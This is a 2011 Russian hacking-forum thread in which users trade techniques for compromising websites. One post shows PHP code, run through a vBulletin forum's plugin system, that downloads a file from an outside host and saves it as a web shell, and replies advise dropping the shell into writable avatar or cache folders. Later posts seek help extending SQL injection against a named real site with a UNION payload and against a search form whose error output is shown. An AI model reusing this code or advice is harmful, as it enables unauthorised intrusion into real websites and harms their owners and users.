27.10.2011, 21:27
|
|
Новичок
Регистрация: 02.10.2011
Сообщений: 15
С нами:
7690646
Репутация:
0
|
|
Спасибо , ликани сыль на Blind SQL
|
|
|
27.10.2011, 22:54
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от root47
Спасибо , ликани сыль на Blind SQL
Вот неплохая статья
тыц
|
|
|
|
27.10.2011, 23:02
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Ребят, вопрос...
Заливка шелла на воблу через плагины. (ajax_complete)
Код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$linky[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://site.com/blabla/name.txt"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$saved[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"./ololo.php"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$linky[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$saved[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"w"[/COLOR][COLOR="#007700"]);
while(![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4096[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fputs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'done'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
При заходе на site.com/forum/ajax.php
выбивает:
Код:
Warning: fopen(./ololo.php) [function.fopen]: failed to open stream: Permission denied in [path]/ajax.php(1279) : eval()'d code on line 4
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7
[куча таких же строчек]
Warning: fclose(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 9
done
Вопрос заключается в том, как же это исправить, либо, есть ли какая альтернатива? |
|
|
|
27.10.2011, 23:15
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от None
Permission denied in [path]/ajax.php(1279)
Нет прав на запись в эту папку для этого скрипта. Ищи ту, в которую можно залить (зачастую с картинками, css, js)
|
|
|
|
27.10.2011, 23:24
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
|
|
|
|
27.10.2011, 23:26
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от Fooog
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
Искать папку с правами на запись. Вроде бы это очевидно.
Посмотри куда заливаются аватарки на форуме, если не в БД сэйвятся, то лей в ту же директорию и шелл.
|
|
|
|
27.10.2011, 23:27
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от Fooog
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?
Плагины тут не причём. Это нормальные настройки на сервере на всю папку. Ищи те, что я сказал, у некоторых цмс есть свои темповые папки или папки под кэш, в них должно залиться(upd: если они конечно юзались, а то так могут и стоять права, при которых ты не сможешь залить)
|
|
|
|
27.10.2011, 23:41
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Насчет папки да. Разобрался.
Сообщение от None
могут и стоять права, при которых ты не сможешь залить
Да, да. Я и говорю о альтернативе...
пс
Сообщение от None
куда заливаются аватарки на форуме
на этом форуме и аватарок нету. |
|
|
|
28.10.2011, 11:32
|
|
Познающий
Регистрация: 23.08.2010
Сообщений: 45
С нами:
8273846
Репутация:
0
|
|
Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...)
-ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
|
|
|
|
28.10.2011, 12:31
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Как бы раскрутить..
Всем привет!
В строку поиска ввожу qwe' asd
Получаю такое:
В строке поиска текст меняется на qwe\' asd
Выводится ошибка:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1
Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc
Можно как-то раскрутить..? сам пробовал, что-то не получается
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
